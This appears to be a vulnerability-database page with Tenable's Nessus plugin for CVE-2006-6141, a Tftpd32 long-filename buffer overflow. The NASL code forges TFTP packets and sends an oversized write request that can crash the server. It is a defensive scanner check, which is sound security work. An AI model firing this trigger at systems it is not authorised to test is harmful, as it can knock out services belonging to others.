Lucene search
This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.TFTPD32_FILENAME_OVERFLOW.NASLHistoryNov 18, 2006 - 12:00 a.m.
Tftpd32 GET/PUT Command File Name Handling Overflow
2006-11-1800:00:00
This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
www.tenable.com
27
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.098 Low
EPSS
Percentile
94.9%
The remote host appears to be running Tftpd32, a tftpd server for Windows.
The version of Tftpd32 installed on the remote host appears to be affected by a buffer overflow vulnerability involving long filenames.
By leveraging this flaw, a remote attacker may be able to crash the server or to execute code on the affected host subject to the privileges under which the server operates, possibly SYSTEM since the application can be configured to run as a service.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(23650);
script_version("1.20");
script_cvs_date("Date: 2019/03/06 18:38:55");
script_cve_id("CVE-2006-6141");
script_bugtraq_id(21148);
script_name(english:"Tftpd32 GET/PUT Command File Name Handling Overflow");
script_summary(english:"Checks for a buffer overflow vulnerability in Tftpd32");
script_set_attribute(attribute:"synopsis", value:"The remote TFTP server is affected by a buffer overflow vulnerability.");
script_set_attribute(attribute:"description", value:
"The remote host appears to be running Tftpd32, a tftpd server for
Windows.
The version of Tftpd32 installed on the remote host appears to be
affected by a buffer overflow vulnerability involving long filenames.
By leveraging this flaw, a remote attacker may be able to crash the
server or to execute code on the affected host subject to the
privileges under which the server operates, possibly SYSTEM since the
application can be configured to run as a service.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/451951/30/0/threaded");
script_set_attribute(attribute:"solution", value:"Unknown at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/11/16");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/11/18");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_family(english:"Windows");
script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.");
script_dependencies("tftpd_detect.nasl");
script_require_keys("Services/udp/tftp", "Settings/ParanoidReport");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
port = get_kb_item("Services/udp/tftp");
if (!port) port = 69;
function tftp_get(port, file) {
local_var data, filter, i, ip, req, res, sport, tries, udp;
if (isnull(port)) port = 69;
if (isnull(file)) return NULL;
req = raw_string(
0x00, 0x01, # Get
file, 0x00, # file
"netascii", 0x00 # as netascii
);
ip = forge_ip_packet(
ip_hl:5,
ip_v:4,
ip_tos:0,
ip_len:20,
ip_id:rand(),
ip_off:0,
ip_ttl:64,
ip_p:IPPROTO_UDP,
ip_src:compat::this_host()
);
sport = rand() % 64512 + 1024;
udp = forge_udp_packet(
ip:ip,
uh_sport:sport,
uh_dport:port,
uh_ulen:8 + strlen(req),
data:req
);
filter = 'udp and dst port ' + sport + ' and src host ' + get_host_ip() + ' and udp[8:1]=0x00';
tries = 2;
for (i=0; i < tries; i++) {
res = send_packet(
udp,
pcap_active:TRUE,
pcap_filter:filter,
pcap_timeout:1
);
if (res) break;
}
# If there's a result, return the data.
if (res) {
return get_udp_element(udp:res, element:"data");
}
}
function tftp_write(port, file) {
local_var data, filter, i, ip, req, res, sport, tries, udp;
if (isnull(port)) port = 69;
if (isnull(file)) return NULL;
req = raw_string(
0x00, 0x02, # Write
file, 0x00, # file
"netascii", 0x00 # as netascii
);
ip = forge_ip_packet(
ip_hl:5,
ip_v:4,
ip_tos:0,
ip_len:20,
ip_id:rand(),
ip_off:0,
ip_ttl:64,
ip_p:IPPROTO_UDP,
ip_src:compat::this_host()
);
sport = rand() % 64512 + 1024;
udp = forge_udp_packet(
ip:ip,
uh_sport:sport,
uh_dport:port,
uh_ulen:8 + strlen(req),
data:req
);
filter = 'udp and dst port ' + sport + ' and src host ' + get_host_ip() + ' and udp[8:1]=0x00';
tries = 2;
for (i=0; i < tries; i++) {
res = send_packet(
udp,
pcap_active:TRUE,
pcap_filter:filter,
pcap_timeout:1
);
if (res) break;
}
# If there's a result, return the data.
if (res) {
return get_udp_element(udp:res, element:"data");
}
}
# If the server is up...
file = string(SCRIPT_NAME, "-", unixtime());
res = tftp_get(port:port, file:file);
if (!isnull(res)) {
# Try to exploit it by writing a file with a long name.
res = tftp_write(port:port, file:file+crap(200)+".txt");
# If we didn't get anything back...
if (isnull(res)) {
# Test the server again.
res = tftp_get(port:port, file:file);
# There's a problem if we didn't get anything back.
if (isnull(res)) security_warning(port:port, protocol:"udp");
}
}
Related
cvelist
cvelist
CVE-2006-6141
2006-11-28 02:00:00
cve
cve
CVE-2006-6141
2006-11-28 02:07:00
nvd
nvd
CVE-2006-6141
2006-11-28 02:07:00
cert
cert
Wyse Simple Imager (WSI) includes vulnerable versions of TFTPD32
2009-11-19 00:00:00
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.098 Low
EPSS
Percentile
94.9%
Related for TFTPD32_FILENAME_OVERFLOW.NASL